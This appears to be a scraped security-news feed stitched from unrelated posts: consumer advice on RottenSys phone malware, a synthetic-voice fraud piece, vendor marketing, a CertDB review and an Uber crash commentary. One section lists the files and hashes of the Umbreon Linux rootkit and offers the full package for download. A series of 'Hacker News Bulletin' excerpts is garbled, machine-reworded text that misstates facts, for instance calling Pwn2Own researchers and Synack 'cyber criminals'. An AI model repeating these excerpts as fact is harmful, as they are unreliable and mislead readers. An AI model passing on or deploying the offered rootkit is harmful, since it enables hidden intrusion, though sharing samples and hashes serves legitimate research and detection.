This attack acts as an indication of change, as over the past two years the mechanism of fraud has adapted. In the past, scams such as this typically have used premium SMS scams to generate revenue, which reach out to a premium number and make small charges that go unnoticed over the course of an extensive period. As described in detail in our Mobile Threat Report: March 2018, we have seen traditional attack vectors, such as premium text messages and toll fraud replaced by botnet ad fraud, pay-per-download distribution scams, and crypto mining malware that can generate millions in revenue.

Long story short – it’s important to still take precautionary steps to avoid future infection from this type of malware scheme. The good news is, you can easily check if your device is being infected with RottenSys. Go to Android system settings→ App Manager, and then look for the following possible malware package names:

  • android.yellowcalendarz
  • changmi.launcher
  • system.service.zdsgt

Beyond that, you can protect your device by following these tips:

  • Buy with security in mind. When looking to purchase your next mobile device, make sure to do a factory reset as soon as you turn it on for the first time.
  • Delete any unnecessary apps. Most mobile providers allow users to delete pre-installed apps. So, if there’s a pre-installed app you don’t use, or seems unknown to you, go ahead and remove it from your device entirely.
  • Always scan your device, even if it’s new. One of the first applications you should load onto a new device is an anti-malware scanner, like McAfee Mobile Security. It can detect and alert users to malicious behavior on their devices. In this case, if a malware variant is detected, new users can see if they can return their infected devices in exchange for a clean one.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone appeared first on McAfee Blogs.

Synthetic Voice |​​ Fraudsters Have Your Data — And Your Voice​

We have reached peak data breach — the number of data breaches and the sensitivity of the information exposed is massive and growing. Unprecedented amounts of data are available on the dark web, and password sharing has run rampant, rendering knowledge-based authentication questions (KBAs) obsolete. And all of these factors impact the state of fraud today.

$14 billion are lost annually to fraud, and 41% of consumers blame the brand for the fraud happening. Together, fraud loss is not only detrimental in terms of monetary loss, but it acts as a reputation risk.

The call center has been identified as the achilles heel — a point of entry for fraudsters into enterprises. Once an individual is authenticated via the phone channel, the caller can make changes to passwords, account information, and shipping addresses. Additionally, fraudsters can determine which agents are the most susceptible to social engineering and use other fraud vectors to take advantage of the call center, and ultimately work towards their goal of financial gain.

To combat fraudsters’ advancements and adaptations, biometric technology has introduced an alternative method of authentication by offering identification through something you are – rather than something you know or have. Voice biometrics are not entirely infallible, though. Their success is largely determined by the strength of underlying machine learning tools, and characterized by how well the technology can establish session variability.

Even though biometric technology offers a stricter layer of security, fraudsters can still take advantage through a variety of techniques, including imitation, voice modification, replay attacks, and voice synthesis. These approaches are typically deterred by state-of-the-art voice biometric engines. However, synthetic voice attacks can bypass many legacy security measures and traditional voice biometrics systems not designed to detect synthetic attacks. With the use of deep learning, a synthetic voice can be created with only a few minutes of genuine speech — which can then be used by fraudsters.

While traditional voice biometric systems can often be fooled by these synthetic voices, most of them wouldn’t get past a human listener. That’s because, when you listen to someone speaking — or a recording of someone speaking — your brain uses your experience, combined with optimistic and skeptical traits, to determine whether or not you should trust that voice. You may not know why you don’t trust a synthetic voice, but you know that it’s not real.

Deep neural networks empower a machine to do what traditional biometrics cannot. Pindrop’s Deep Voice™ biometric engine uses this technology to work like a human brain — encompassing both optimistic and skeptical characteristics — and is capable of identifying synthetic speech. As technology advances to fool human suspicions, technology must also advance to fill that gap. To learn more, watch our on-demand session, “Synthetic Voices are Outsmarting Your Biometric Security.”

The post Synthetic Voice |​​ Fraudsters Have Your Data — And Your Voice​ appeared first on Pindrop.

Podcast: AppSec’s Effect on the Bottom Line

Traditionally, most executives have thought of security as a necessary evil – an investment that was needed solely to avoid a bad outcome, but not something that would bring in new customers or boost revenue. But that seems to be changing. CA Technologies recently surveyed IT and business leaders to find out how well organizations are integrating security throughout the development process – a methodology known as DevSecOps.

The survey results highlight the effect of doing security right on the bottom line: analysis shows a clear correlation between how effectively security is managed in the development cycle and improving revenues and profits.

The research found that organizations that are making progress in the shift toward true DevSecOps outperform those organizations that lag in adoption. These security-minded organizations are:

  • 2.6 times more likely to have security testing keep up with frequent app updates
  • 2.4 times more likely to be leveraging security to enable new business opportunities
  • 2.5 times more likely to be outpacing their competitors
  • Have 50 percent higher profit growth and 40 percent higher revenue growth

What’s behind these numbers? Ayman Sayed, president and chief product officer at CA Technologies, recently sat down with Evan Schuman to discuss the results and what they imply. Listen to CA Veracode’s AppSec in Review podcast episode 14 to find out why shifting security left in the development cycle is about more than cost avoidance and how it can affect your bottom line.

EDR – Not just for Large Enterprises?

When you think of Endpoint Detection and Response (EDR) tools, do you envision a CSI-style crime lab with dozens of monitors and people with eagle eye views of what their users and defenses are doing? For many, the idea of EDR seems like something for “the big players” with teams of highly trained people. This is based on the historical products and presentations of these tools in days gone by however, it’s no longer true.

What Changed?

For starters, threats and the need to investigate them to prevent a repeat of an outbreak or breach. Malware and attack methods became smarter to put it simply and stopping them became much more difficult. Threats don’t always look like threats anymore. The same type of attack might arrive through the web, email, as a different file type with a different name but with the same intent: avoid detection and compromise your endpoints.

Defenses have evolved as well, but as part of that growth another problem grew with it. More defenses means more reports, alerts and places to go to investigate and then remediate a threat. Economically, most organizations have not put more staff into the mix alongside this change. The “do more with less” mantra hasn’t left the minds of many, and the result is too many security practitioners drowning in noise and overwhelmed with management tools and data. Perhaps that’s why so many resort to simply re-imaging a machine instead of investigating or remediating a threat. It seems easier (and it probably is) for many. See our infographic ‘A Return to Endpoint Protection Platforms’ for more on how the use of disparate point tools increases operational complexity.

Lastly, the need to do things differently happened. The latest Gartner Market Guide for Endpoint Detection and Response shows a strong shift in the number of organizations that now consider EDR a need and plan to invest in it. Security Practitioners are shifting gears as the nature of threats and the need to know how they arrived, what they attempted to do and where else they may have attempted entry occurred.

It Doesn’t Have to Take a Village Anymore

Something else changed as these the landscape evolved – EDR solutions became easier and simpler to work with. EDR is no longer a tool that requires a dozen people or a Security Operations Center (SOC). Dashboard style management with prioritized, at-a-glance data has replaced lengthy reports and overwhelming alert volume. More integrated approaches have also cut down manual processes, replacing them with automated responses and automatic contextual insights. This also cuts complexity when delivered as part of an Endpoint Protection platform (EPP). For more details, watch a video on the role of EDR and Machine Learning and the Return to Endpoint Protection Platform Suites.

It no longer requires extensive training or expertise to use and realize value from EDR solutions. Security Practitioners can now simply log in, click to the heart of a threat and remediate it in a short period of time. Remediation can happen in as little as one click and setting traps, triggers and responses for future threats takes only a few minutes.

McAfee offers an integrated EDR solution that gives prioritized data and alerts with a dashboard view of your environment and makes it easy to click to the eye of a threat in seconds.  One of our customers was able to go from using spreadsheets and manual processes to getting data in seconds.

If you’re ready to see how easy and effective EDR can be, check out this video below to see a Metasploit attack halted with a straight forward investigation.

The post EDR – Not just for Large Enterprises? appeared first on McAfee Blogs.

CA Veracode Named a Leader in the Gartner Magic Quadrant for Application Security for the Fifth Report in a Row

For the fifth consecutive report, Gartner placed CA Veracode as a Leader in the 2018 Magic Quadrant for Application Security Testing1.  Gartner chooses leaders for the report based on a company’s completeness of vision and ability to execute in the application security testing (AST) market.

In recent years, we’ve witnessed the rise in adoption of DevSecOps and Modern Software Factory approaches to software development. Since our inception, our mission has been to secure the world’s software, and we believe that in order to achieve that mission we need to empower developers to bring security into the earliest stages of the development process. We put our energies into creating static testing tools that meet developers where they are – in their IDEs as they’re writing code. In our experience, organizations who have adopted secure coding techniques are creating the kind of high quality software that serves as a true value driver for their businesses.

In Gartner Inc.’s 2018 “Magic Quadrant for Application Security Testing1,” Ayal Tirosh, Dionisio Zumerle and Mark Horvath state that, “Through 2021, the AST market is projected to have a 14% compound annual growth rate (CAGR). This continues to be the fastest growing of all tracked information security segments. The overall global information security market is forecast to grow at a CAGR of 7.6% through 2021. The AST market size is estimated to reach $775 million by the end of 2018.1

It has been an incredible year for us, and we’re so excited that Gartner continues to recognize CA Veracode as leaders in application security testing. We’ve dedicated time, energy and creativity to developing and offering a comprehensive application security platform that is in alignment with current software development paradigms and supports the Modern Software Factory approach. Coupled with our designed-for-developer solutions, CA Veracode VerifiedeLearning capabilities and support through our community, we help to make security a seamless element of the software lifecycle. If there is one thing we know for sure, it’s that secure software is synonymous with great software.

To see what Gartner had to say about CA Veracode, download the entire Magic Quadrant:

1Gartner, Inc. 2018 “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Dionisio Zumerle and Mark Horvath. March 19, 2018

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Rootkit Umbreon / Umreon – x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro

There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)


Download Email me if you need the password  

File information

Part one (full package)

#File NameHash ValueFile Size (on Disk)Duplicate?
1.umbreon-ascii0B880E0F447CD5B6A8D295EFE40AFA376085 bytes (5.94 KiB)
2autoroot1C5FAEEC3D8C50FAC589CD0ADD0765C7281 bytes (281 bytes)
3CHANGELOGA1502129706BA19667F128B44D19DC3C11 bytes (11 bytes)
4cli.shC846143BDA087783B3DC6C244C2707DC5682 bytes (5.55 KiB)
5hideportsD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)Yes, of file promptlog
6install.sh9DE30162E7A8F0279E19C2C30280FFF85634 bytes (5.5 KiB)
7Makefile0F5B1E70ADC867DD3A22CA62644007E5797 bytes (797 bytes)
8portchecker006D162A0D0AA294C85214963A3D3145113 bytes (113 bytes)
9promptlogD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)
10readlink.c42FC7D7E2F9147AB3C18B0C4316AD3D81357 bytes (1.33 KiB)
11ReadMe.txtB7172B364BF5FB8B5C30FF528F6C51252244 bytes (2.19 KiB)
12setup694FFF4D2623CA7BB8270F5124493F37332 bytes (332 bytes)
13spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)Yes, of file
14umbreon.c91706EF9717176DBB59A0F77FE95241C1007 bytes (1007 bytes)
15access.c7C0A86A27B322E63C3C29121788998B8713 bytes (713 bytes)
16audit.cA2B2812C80C93C9375BFB0D7BFCEFD5B1434 bytes (1.4 KiB)
17chown.cFF9B679C7AB3F57CFBBB852A13A350B22870 bytes (2.8 KiB)
18config.h980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)
19config.h.dist980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)Yes, of file config.h
20dirs.c46B20CC7DA2BDB9ECE65E36A4F987ABC3639 bytes (3.55 KiB)
21dlsym.c796DA079CC7E4BD7F6293136604DC07B4088 bytes (3.99 KiB)
22exec.c1935ED453FB83A0A538224AFAAC71B214033 bytes (3.94 KiB)
23getpath.h588603EF387EB617668B00EAFDAEA393183 bytes (183 bytes)
24getprocname.hF5781A9E267ED849FD4D2F5F3DFB8077805 bytes (805 bytes)
25includes.hF4797AE4B2D5B3B252E0456020F58E59629 bytes (629 bytes)
26kill.cC4BD132FC2FFBC84EA5103ABE6DC023D555 bytes (555 bytes)
27links.c898D73E1AC14DE657316F084AADA58A02274 bytes (2.22 KiB)
28local-door.c76FC3E9E2758BAF48E1E9B442DB98BF8501 bytes (501 bytes)
29lpcap.hEA6822B23FE02041BE506ED1A182E5CB1690 bytes (1.65 KiB)
30maps.c9BCD90BEA8D9F9F6270CF2017F9974E21100 bytes (1.07 KiB)
31misc.h1F9FCC5D84633931CDD77B32DB1D50D02728 bytes (2.66 KiB)
32netstat.c00CF3F7E7EA92E7A954282021DD72DC41113 bytes (1.09 KiB)
33open.cF7EE88A523AD2477FF8EC17C9DCD7C028594 bytes (8.39 KiB)
34pam.c7A947FDC0264947B2D293E1F4D69684A2010 bytes (1.96 KiB)
35pam_private.h2C60F925842CEB42FFD639E7C763C7B012480 bytes (12.19 KiB)
36pam_vprompt.c017FB0F736A0BC65431A25E1A9D393FE3826 bytes (3.74 KiB)
37passwd.cA0D183BBE86D05E3782B5B24E2C964132364 bytes (2.31 KiB)
38pcap.cFF911CA192B111BD0D9368AFACA03C461295 bytes (1.26 KiB)
39procstat.c7B14E97649CD767C256D4CD6E4F8D452398 bytes (398 bytes)
40procstatus.c72ED74C03F4FAB0C1B801687BE200F063303 bytes (3.23 KiB)
41readwrite.cC068ED372DEAF8E87D0133EAC0A274A82710 bytes (2.65 KiB)
42rename.cC36BE9C01FEADE2EF4D5EA03BD2B3C05535 bytes (535 bytes)
43setgid.c5C023259F2C244193BDA394E2C0B8313667 bytes (667 bytes)
44sha256.h003D805D919B4EC621B800C6C239BAE0545 bytes (545 bytes)
45socket.c348AEF06AFA259BFC4E943715DB5A00B579 bytes (579 bytes)
46stat.cE510EE1F78BD349E02F47A7EB001B0E37627 bytes (7.45 KiB)
47syslog.c7CD3273E09A6C08451DD598A0F18B5701497 bytes (1.46 KiB)
48umbreon.hF76CAC6D564DEACFC6319FA167375BA54316 bytes (4.21 KiB)
49unhide-funcs.c1A9F62B04319DA84EF71A1B091434C644729 bytes (4.62 KiB)
50cryptpass.py2EA92D6EC59D85474ED7A91C8518E7EC192 bytes (192 bytes)
51environment.sh70F467FE218E128258D7356B7CE328F11086 bytes (1.06 KiB)
52espeon-connect.shA574C885C450FCA048E79AD6937FED2E247 bytes (247 bytes)
53espeon-shell9EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
54espeon.c499FF5CF81C2624B0C3B0B7E9C6D980D14899 bytes (14.55 KiB)
55listen.sh69DA525AEA227BE9E4B8D59ACFF4D717209 bytes (209 bytes)
56spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
57ssh-hidden.shAE54F343FE974302F0D31776B72D0987127 bytes (127 bytes)
58unfuck.c457B6E90C7FA42A7C46D464FBF1D68E2384 bytes (384 bytes)
59unhide-self.pyB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
60listen.shF5BD197F34E3D0BD8EA28B182CCE7270233 bytes (233 bytes)

part 2 (those listed in the Trend Micro article)
#File NameHash ValueFile Size (on Disk)
1015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28acA47E38464754289C0F4A55ED7BB556489375 bytes (9.16 KiB)
20751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53aF9BA2429EAE5471ACDE820102C5B81597512 bytes (7.34 KiB)
30a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
40ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ffB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
5122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e86709EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
6409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64aB4746BB5E697F23A5842ABCAED36C9146149 bytes (6 KiB)
74fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234D0D97899131C29B3EC9AE89A6D49A23E65160 bytes (63.63 KiB)
88752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784E7E82D29DFB1FC484ED277C70218781855564 bytes (54.26 KiB)
9991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b730885222B1863ACDC0068ED5D50590CF792DF057664 bytes (7.48 KiB)
10a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddfA977F68C59040E40A822C384D1CEDEB6176 bytes (176 bytes)
11aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809bDF320ED7EE6CCF9F979AEFE451877FFC26 bytes (26 bytes)
12acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa452584D552B5D22E40BDA23E6587B1BC532D6852 bytes (6.69 KiB)
13c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480087DD79515D37F7ADA78FF5793A42B7B11184 bytes (10.92 KiB)
14e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853BBEB18C0C3E038747C78FCAB3E0444E371940 bytes (70.25 KiB)

Is your VPN secure? How to check for leaks

A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?

To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for what is my IP on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That’s a good place to start, but there is more to your internet connection and its potential for leaks.

To read this article in full, please click here

CertDB is a free SSL certificate search engine and analysis platform

CertDB is a free SSL certificate search engine and analysis platform

How many times have you stumbled on the SSL certificate, and the only things that you cared about were Common Name (CN), DNS Names, Dates (issue and expiry)? Do you know SSL certificate can speak so much about you/ your firm? It can tell stories and motives; you can gather a good intelligence from them - which companies are hosting new domains, sub-domains; did they just revoke the last certificate? Or, why some firm switched its vendors/ CA(s)? We all have read that SSL certificates have always been the talk of the town for their inherent strength but weak issuance process, i.e. the chain of command relying on the Certificate Authorities, (aka the business firms) but haven't played with them in real-time. There are search engines available but none of them as comprehensive, fast and free as CertDB

There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even involved[3] directly. Even though the vast initiatives by browsers and firms to regularly monitor SSL certificates[4], improve browser behaviours for awareness[5] and revoke the bad ones has been highly appreciated, the pentesters often don't find much during the comprehensive assessment. Recently, there has been an uproar on the business interests of CA(s) with the issuance, so much so that some are being tagged as bad and untrusted CA[6] for not doing job well. Companies are moving aggressively to HTTPS especially with the recent introduction of LetsEncrypt Wildcard Certificates. But we haven't seen the use of all this information on a common platform to further analyse the certificates and assess their digital SSL footprint and gather valuable intelligence.

This is where CertDB steps in. A great project maintained by smart people and FREE forever[7] for the public. I spent last few weeks accessing their services, and the platform and my short verdict says - It is great! It does have some quirks, but highly recommended!

The and CertDB serve different objectives. while gets the data from certificate transparency (CT) logging system where "legit" CA submit the certs in "real time"; CertDB is based on the scanning the IPv4 segment, domains and "finding & analyzing" certificates - good or bad.

CertDB can also find self-signed certificates, which can not. Hence, CertDB can give a realistic view of HTTPS - which IP is using what certs, self-signed, invalid CA etc; while shows the "good" law-abiding view, per say.

What is CertDB?

CertDB is an Internet search engine for SSL certificates. In simple terms, it parses the certificate and then makes different fields indexable for the user to execute search queries. It indexes the following common information,
CertDB is a free SSL certificate search engine and analysis platform

Fields Details
Subject Country, State, Category, Serial Number, Locality, Organization, Common Name
Issuer Country, State, Locality, Organization, Common Name
Others Public Key IP Address related to the domain, Validity Dates
Fingerprint SHA1, SHA256 and MD5
Extensions Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies

Now once you have extracted these fields, you can query and generate intelligence around it. You have these fields available with a logical query, and can be clubbed together to make complex queries. CertDB also provides raw certificates, public key and json formatted certificate information available for download. Recently they have integrated Alexa Ranking with the domains/ IP addresses and all of this information has been filtered and is available as lists - top domains, top organizations, top countries, top issuers etc.

One such exciting list is "expiring certificates" where you can find the list of Domains/ Organizations whose certificates are about to expire. This kind of information can be convenient while auditing or assessing the firm's digital footprint.

Real-time updates

While the documentation says the CertDB continuously scans every reachable web-server, on the Internet; the lab tests are not conclusive. I have asked the team to clarify and shall publish the response as part of the interview once I have a confirmed reply. But, it's appreciable that once their scanner detects the certificate, the information is available for the public to perform the required analysis in near real-time.

Use Cases

While we have all the information extracted from the digital certificates, we have to filter the results to get the required information via GUI or API. The GUI is open to all and can be used to do such queries with search-box, but to use the API one has to register an account.

You can register at, and an API key shall be allotted to you to perform 1000 queries a day with maximum 1000 results per query.

Field Value
Method GET, POST
api_key <get your key post registration>
q Any query (just like in search interface)
response_type 0 — JSON list of the dictionary with found certificates with all details
1 — JSON list of found certificates in base64
2 — JSON list of distinct organizations from found certificates
3 — JSON list of distinct domains from found certificates

It takes 30 seconds to register and receive the API Key. Here are few examples of querying the right information,

  1. Search for Issuer "Godaddy" issued certificate for an "Italian region" domain/company.
    issuer:"" country:"Italy"
  2. Certificates issued to a subnet or IP range (example: Amazon Global IP Range:[8])
    cidr:"" (example: replace , with newline and only list first 10 results tr , '\n' | head -10
    CertDB is a free SSL certificate search engine and analysis platform
  3. Expiring in next ten days.
    expiring:"10 days"
  4. Expiring certificates in next seven days for Netflix organization
    expiring:"7 days" organization:"Netflix"
    CertDB is a free SSL certificate search engine and analysis platform
  5. New Certificates in last five days for Safeway Insurance Company (via API)
    new:"5 days" organization:"Safeway Insurance Company"
    CertDB is a free SSL certificate search engine and analysis platform

There can be many such cases where you would like to know the certificates issued to a firm in the past; or if the firm recently got a new domain/ sub-domain and looking for a new business line. I could think of the following interesting cases if I am doing an assessment,

  1. Dork all the subdomains; and then start negating in a loop as per the first result. -www to -www -test. Or, use a threat intel tool to gather the sub-domains and validate if they all have SSL certificates. Manually check, and report if some domains are not on HTTPS (Refer: Google will be hard on you if you are not on HTTPS!)
  2. If you are technically assessing a company, do check their domains names and Organization. q="organization:"Example Inc." and you will be surprised to see sometimes firms are not aware of the domains on their name, or certificate issued by them but not renewed on time.


While the service is great, there are few issues as well which the team is working on,

  1. The errors are not customized. If the API queries are wrong; it dumps a lot of debug data which must be removed.
  2. The API key cannot be re-generated or revoked. You may have to contact CertDB support to revoke it.
  3. The API Key can be used in a GET request. It is not recommended as it can be cached at many hops (example: proxy)
  4. The documentation is not comprehensive, and probably more detailed information is needed when using API calls.
  5. The site doesn't provide an example of API interaction. In my opinion, CertDB should write a page with few examples using Python, CURL, Ruby, Perl and other common languages including json parsing of the results.


It's been few weeks since I am using this service, and my frank opinion is it has great potential and use. I am using this service while assessing AWS instances, and Fortune 500 firms. I have also found some expiring certificates for the clients and informed them in due course of time. I would highly recommend you to have a look and register an account. You can also set a cron job to check the dates/ digital SSL footprint of an organization.

Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.

Cover Image Credit: Photo by Rubén Bagüés

  1. Comodo CA attack by Iranian hackers ↩︎

  2. Dutch DigiNotar attack by Iranian hackers ↩︎

  3. CEO Emails Private Keys ↩︎

  4. Certificate Transparency is important ↩︎

  5. A secure web by Google ↩︎

  6. Distrust of the Symantec PKI: Immediate action needed by site operators ↩︎

  7. In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use. ↩︎

  8. Amazon IP Range: ↩︎

More Crypto, More Problems – Application Security Weekly #09

This week, Keith and Paul discuss Uber's open source tool for adversarial simulation, AMD processors, Hijacked MailChimp accounts  used to distribute banking malware, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Three Hacking Groups You Definitely Need to Know About

Hacker groups began to flourish in the early 1980s with the emergence of computer. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. Hackers usually cover up their tracks by leaving false clues or by leaving absolutely no evidence behind. In the light of

The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults

The enormous number of hacks in 2014 have propelled information safety into the front of the news and the brains of many companies. Cyber attacks on big enterprises like Target, Sony, and Home Depot lately caused President Obama to call for partnership amongst the two sectors (private and public) in order to share the information

The post Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software?

Windows has the added facility to work as a VPN server, even though this choice is undisclosed. This can work on both versions of Windows – Windows 8 and Windows 7. To enable this, the server makes use of the point-to-point tunneling protocol (PPTP.) This could be valuable for linking to your home system on

The post Want to have a VPN Server on Your Computer (Windows) Without setting up Any Software? appeared first on Hacker News Bulletin | Find the Latest Hackers News.

The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed

Pemera Blue Cross, a United States of America – based health insurance corporation, has confided in that its systems were infringed upon and their security and associability was breached when  cyber criminals hacked the company and made their way in 11 million of their customers’ records. It is the second cyber attack in a row

The post The Health insurance Company – Premera Blue Cross – of the United States of America was cyber criminally attacks and 11 million records were accessed appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Political analysts caution air plane connections systems that are susceptible to cyber attacks

Marketable and even martial planes have an Achilles heel that could abscond them as susceptible to cyber criminals on the ground, who specialists say could possibly seize cockpits and generate disorder in the skies. At the present, radical groups are thought to be short of the complexity to bring down a plane vaguely, but it

The post Political analysts caution air plane connections systems that are susceptible to cyber attacks appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Researcher makes $225,000, legally, by cyber attacking browsers

A single researcher who is actually a cyber criminal made $225,000 this week  – that too all by legal means! This cyber research hacker cyber criminally attacked browsers this past week. For the past two days, safety researchers have tumbled down on Vancouver for a Google – sponsored competition called Pwn – 2 – Own,

The post Researcher makes $225,000, legally, by cyber attacking browsers appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer

Associates of two Chinese cyber crime teams have hollowed out the best prizes at a main yearly hacking competition held in Vancouver, Canada. Cyber attackers at Pwn2Own, commenced in 2007, were triumphant in violating the security of broadly -used software including Adobe Flash, Mozilla’s Firefox browser, Adobe PDF Reader and Microsoft’s freshly – discontinued Internet

The post Vanished in 60 seconds! – Chinese cyber criminals shut down Adobe Flash, Internet Explorer appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Microsoft Remote Desktop Connection Manager

Imagine having the access and control to your computer to any place in the world from your iPhone. That would be really futuristic, no? Actually, this is not because there are applications available that can let you tap into your computer from on your mobile. These remote control applications do more than simply allow you

The post Microsoft Remote Desktop Connection Manager appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’

The hack – tivist cyber criminal group Anonymous, more often than not related with cyber campaigns in opposition to fraudulent government administrations and terrorist organizations, has now set its sights on space. They posted a video on the group’s most important You Tube channel on the 18th of March, and called on to everyone through

The post Anonymous wants to further its engagement in the exploration of space – ‘Unite as Species’ appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Do IT Pros Consider Security When Purchasing Software?

Traditionally, security was about cost avoidance. It was thought of like insurance – something you have to have in case something bad happens, but not something that would boost the bottom line or attract customers. But in today’s environment, we are increasingly seeing that security is about more than cost avoidance; done right, it creates a competitive advantage. The results of a recent IDG survey of IT pros found that the vast majority are in fact more likely to purchase software that has been certified secure by a third party. In this way, security goes from a way to avoid something bad to a way to proactively bring in business.

Security as a competitive advantage

If your customers and prospects aren’t asking about the security of your software product, they will be. With breaches dominating the headlines – and damaging corporations and careers – software purchasers are increasingly wary about the code they are bringing into their organizations and want assurance that it is not leaving them open to attack. And a recent joint survey from CA Veracode and IDG Research backs up this point. We surveyed IT professionals and executives who are involved in the purchase of software at their organizations about the role security plays in their purchase decisions. A whopping 95 percent of survey respondents reported that their confidence in a vendor whose application security has been validated by an established independent security expert would increase at least somewhat, and 66 percent said they are much more likely to work with that vendor. Nearly every respondent (99 percent) perceives advantages of working with a certified secure vendor, including improved comfort of customers regarding data security and improved protection of IP data.

What exactly were our respondents looking for in terms of software security?

When asked what an independent security validation program should look like, more than 70 percent of respondents placed critical or high importance on each of the following:

  • Certification that the software/application code is free of security related defects
  • Verification that the providers have a certified and trained security champion in-house
  • Imposed/guaranteed time restriction for remediation of future security issues/flaws
  • Verification that the providers have integrated continuous scanning to detect vulnerabilities throughout the development process

But the respondents also report struggling to get this information from their vendors. Nearly all organizations (99 percent) run into roadblocks when trying to assess the security status of applications and software they didn’t develop in-house. These challenges range from difficulty of verifying the security of open source code to an inability to obtain the code necessary to conduct independent testing, and a lack of necessary information from software vendors about their security and testing practices. Even when they do get security information from vendors, survey respondents note that security information from vendors is either too difficult to understand or too time consuming to read through, creating frustration that can delay, or even end, sales cycles.

Prove the security of your software at a glance

By working to embed security testing into your development process, and then getting that initiative validated by an independent third party, you prove at a glance that security is a priority, addressing your prospects’ security concerns pre-emptively and, in turn, speeding your sales cycles. With CA Veracode’s new CA Veracode Verified program, you’ll get this third-party validation from one of the most respected names in the industry. The Verified seal allows you to address your customers’ and prospects’ security questions and concerns pre-emptively, making you stand out among the competition. And, representation in the CA Veracode Verified directory provides you the visibility to a larger audience of prospects and customers looking for partners who can provide solutions driven by secure software.

Get all the details on IDG’s survey results in the How to Make Security a Competitive Advantage report.

Find out more about getting ahead of the competition by getting your app Verified.

Self-Driving Uber Murders Pedestrian

Although it still is early in the news cycle, so far we know from Tempe police reports that an Uber robot has murdered a women.

The Uber vehicle was reportedly headed northbound when a woman walking outside of the crosswalk was struck.

The woman was taken to the hospital where she died from her injuries.

Tempe Police says the vehicle was in autonomous mode at the time of the crash and a vehicle operator was also behind the wheel.

First, autonomous mode indicates to us that Uber’s engineering team now must admit their design decisions led to this easily predictable disaster of a robot taking a human life. For several years I’ve been giving talks about this exact situation, including AppSecCali where I recently mentioned why and how driverless cars are killing machines. Don’t forget the Uber product already was caught ignoring multiple red lights and crosswalks in SF. It was just over a year ago that major news sources issued the warning to the public.

…the self-driving car was, in fact, driving itself when it barreled through the red light, according to two Uber employees…and internal Uber documents viewed by The New York Times. All told, the mapping programs used by Uber’s cars failed to recognize six traffic lights in the San Francisco area. “In this case, the car went through a red light,” the documents said.

This doesn’t sufficiently warn pedestrians of the danger. Ignoring red lights really goes back a few months before the NYT picked up the story, into December 2016. Here you can see me highlighting the traffic signals and a pedestrian, asking for commentary on obvious ethics failures in Uber engineering. Consider how the pedestrian stepping into a crosswalk on the far right would be crossing in front of the Uber as it runs the red light:

